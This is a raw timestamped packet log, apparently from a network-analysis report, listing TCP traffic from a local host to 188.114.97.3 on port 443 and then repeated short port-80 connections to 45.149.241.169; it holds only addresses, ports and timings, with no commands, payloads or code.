                                                          Oct 3, 2024 09:20:42.055799961 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.055825949 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.055870056 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.056010008 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.056063890 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.058017969 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.058078051 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.058079958 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.058103085 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.058156013 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.111797094 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.112019062 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.112173080 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.112231970 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.112243891 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.112303019 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.112359047 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.112365007 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.112435102 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.112870932 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.112925053 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.112999916 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.113059044 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.113804102 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.113857985 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.113923073 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.113971949 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.114695072 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.114746094 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.114964962 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.115019083 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.701965094 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.702050924 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.702121019 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.702159882 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.702171087 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.743246078 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.778862000 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.779014111 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.779047966 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.779115915 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.882430077 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.882493019 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.884565115 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.884649038 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.934788942 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.934899092 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.934919119 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.934941053 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.934988022 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.031024933 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.031104088 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.031117916 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.031151056 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.031182051 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.031199932 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.031642914 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.031682014 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.031686068 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.031694889 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.031733990 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.033894062 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.033952951 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.033994913 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.034038067 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.034044027 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.075192928 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.116597891 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.116650105 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.116672039 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.116683960 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.116718054 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.116734028 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.126434088 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.126491070 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.209958076 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.209980965 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.210016012 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.210077047 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.210095882 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.210124016 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.210149050 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.245990038 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.246009111 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.246090889 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.246121883 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.246131897 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.246819973 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.246885061 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.246898890 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.246985912 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.356832981 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.356856108 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.356925011 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.356960058 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.356998920 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.357007980 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.359107018 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.359174013 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.359198093 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.359215975 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.359236956 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.399498940 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.404328108 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.404392958 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.404489994 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.404524088 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.404535055 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.405793905 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.405810118 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.405858040 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.405868053 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.405905008 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.446355104 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.477339029 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.477361917 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.477397919 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.477463007 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.477495909 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.477509022 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.477580070 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.487099886 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.487152100 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.487205982 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.487236977 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.487250090 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.540115118 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.558022976 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.558052063 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.558166981 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.558201075 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.558254004 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.559561968 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.559614897 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.559631109 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.559642076 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.559673071 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.559705973 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.631717920 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.631819010 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:43.631853104 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.631910086 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:43.651026964 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:46.719624043 CEST4970780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:46.735009909 CEST804970745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:46.735107899 CEST4970780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:46.737293959 CEST4970780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:46.743175030 CEST804970745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:46.743247032 CEST4970780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:46.749135971 CEST804970745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:47.526560068 CEST804970745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:47.526624918 CEST804970745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:47.526720047 CEST4970780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:47.526850939 CEST4970780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:47.531702995 CEST804970745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:47.667347908 CEST4970880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:47.677870035 CEST804970845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:47.678041935 CEST4970880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:47.680047989 CEST4970880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:47.692085981 CEST804970845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:47.692235947 CEST4970880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:47.701711893 CEST804970845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:48.453088999 CEST804970845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:48.453316927 CEST4970880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:48.453324080 CEST804970845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:48.453372002 CEST4970880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:48.458396912 CEST804970845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:48.531378031 CEST4970980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:48.550137043 CEST804970945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:48.551019907 CEST4970980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:48.552500963 CEST4970980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:48.567814112 CEST804970945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:48.567975998 CEST4970980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:48.577838898 CEST804970945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:56.427699089 CEST804970945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:56.428033113 CEST4970980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:56.428255081 CEST804970945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:56.428303003 CEST4970980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:56.433087111 CEST804970945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:56.574260950 CEST4971580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:56.588548899 CEST804971545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:56.588707924 CEST4971580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:56.590853930 CEST4971580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:56.608449936 CEST804971545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:56.608551979 CEST4971580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:56.616458893 CEST804971545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:57.648911953 CEST804971545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:57.649848938 CEST4971580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:57.850330114 CEST4971680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:57.961991072 CEST4971580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:58.057420969 CEST804971545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:58.057475090 CEST4971580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:58.057509899 CEST804971545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:58.057542086 CEST4971580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:58.057943106 CEST804971545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:58.057971954 CEST804971645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:58.058073997 CEST804971545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:58.058418036 CEST4971680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:58.069458008 CEST4971680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:58.316124916 CEST804971645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:58.316278934 CEST4971680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:58.325968027 CEST804971645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:59.140589952 CEST804971645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:59.140816927 CEST4971680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:59.140839100 CEST804971645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:59.140922070 CEST4971680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:59.146092892 CEST804971645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:59.276479959 CEST4971780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:59.281760931 CEST804971745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:59.281872988 CEST4971780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:59.283987045 CEST4971780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:59.297473907 CEST804971745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:20:59.297568083 CEST4971780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:20:59.316531897 CEST804971745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:00.116126060 CEST804971745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:00.116460085 CEST804971745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:00.116580009 CEST4971780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:00.183010101 CEST4971780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:00.189299107 CEST804971745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:00.479073048 CEST4971880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:00.484904051 CEST804971845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:00.485011101 CEST4971880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:00.487117052 CEST4971880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:00.494637966 CEST804971845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:00.494707108 CEST4971880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:00.499641895 CEST804971845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:01.613163948 CEST804971845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:01.613213062 CEST804971845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:01.613317966 CEST4971880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:01.613380909 CEST4971880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:01.618177891 CEST804971845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:01.765247107 CEST4971980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:01.770503998 CEST804971945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:01.770618916 CEST4971980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:01.772759914 CEST4971980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:01.777630091 CEST804971945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:01.777715921 CEST4971980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:01.782587051 CEST804971945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:03.525882006 CEST804971945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:03.526068926 CEST804971945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:03.526211023 CEST4971980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:03.526211023 CEST4971980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:03.531218052 CEST804971945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:03.670648098 CEST4972080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:03.676484108 CEST804972045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:03.678564072 CEST4972080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:03.678724051 CEST4972080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:03.683936119 CEST804972045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:03.684047937 CEST4972080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:03.689374924 CEST804972045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:04.410466909 CEST804972045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:04.410657883 CEST4972080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:04.410867929 CEST804972045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:04.410918951 CEST4972080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:04.415994883 CEST804972045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:04.557486057 CEST4972180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:04.578835964 CEST804972145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:04.579140902 CEST4972180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:04.581398010 CEST4972180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:04.600364923 CEST804972145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:04.600647926 CEST4972180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:04.614440918 CEST804972145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:05.365163088 CEST804972145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:05.365411997 CEST804972145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:05.365447044 CEST4972180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:05.365627050 CEST4972180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:05.371099949 CEST804972145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:05.512638092 CEST4972280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:05.517693043 CEST804972245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:05.518567085 CEST4972280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:05.520092964 CEST4972280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:05.527950048 CEST804972245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:05.528198004 CEST4972280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:05.533143044 CEST804972245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:06.262666941 CEST804972245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:06.262739897 CEST804972245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:06.262912989 CEST4972280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:06.263021946 CEST4972280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:06.270015955 CEST804972245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:06.410002947 CEST4972380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:06.416441917 CEST804972345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:06.416732073 CEST4972380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:06.418783903 CEST4972380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:06.423690081 CEST804972345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:06.423847914 CEST4972380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:06.428869963 CEST804972345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:07.156114101 CEST804972345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:07.156686068 CEST4972380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:07.157257080 CEST804972345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:07.157779932 CEST4972380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:07.162168026 CEST804972345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:07.311839104 CEST4972480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:07.323482037 CEST804972445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:07.323698044 CEST4972480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:07.330524921 CEST4972480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:07.339010954 CEST804972445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:07.339145899 CEST4972480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:07.349272013 CEST804972445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:08.095299959 CEST804972445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:08.095624924 CEST4972480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:08.095794916 CEST804972445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:08.095837116 CEST4972480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:08.100419998 CEST804972445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:08.242543936 CEST4972580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:08.247611046 CEST804972545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:08.247709990 CEST4972580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:08.249841928 CEST4972580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:08.254713058 CEST804972545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:08.254832983 CEST4972580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:08.260013103 CEST804972545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:09.011538029 CEST804972545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:09.011565924 CEST804972545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:09.011679888 CEST4972580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:09.011679888 CEST4972580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:09.016618967 CEST804972545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:09.151628971 CEST4972680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:09.156621933 CEST804972645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:09.156709909 CEST4972680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:09.158802032 CEST4972680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:09.163705111 CEST804972645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:09.163793087 CEST4972680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:09.168683052 CEST804972645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:09.861022949 CEST804972645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:09.861042023 CEST804972645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:09.861236095 CEST4972680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:09.861434937 CEST4972680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:09.866203070 CEST804972645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:10.025063992 CEST4972780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:10.030177116 CEST804972745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:10.030442953 CEST4972780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:10.033673048 CEST4972780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:10.038615942 CEST804972745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:10.038727999 CEST4972780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:21:10.043526888 CEST804972745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:21:10.867872000 CEST804972745.149.241.169192.168.2.10
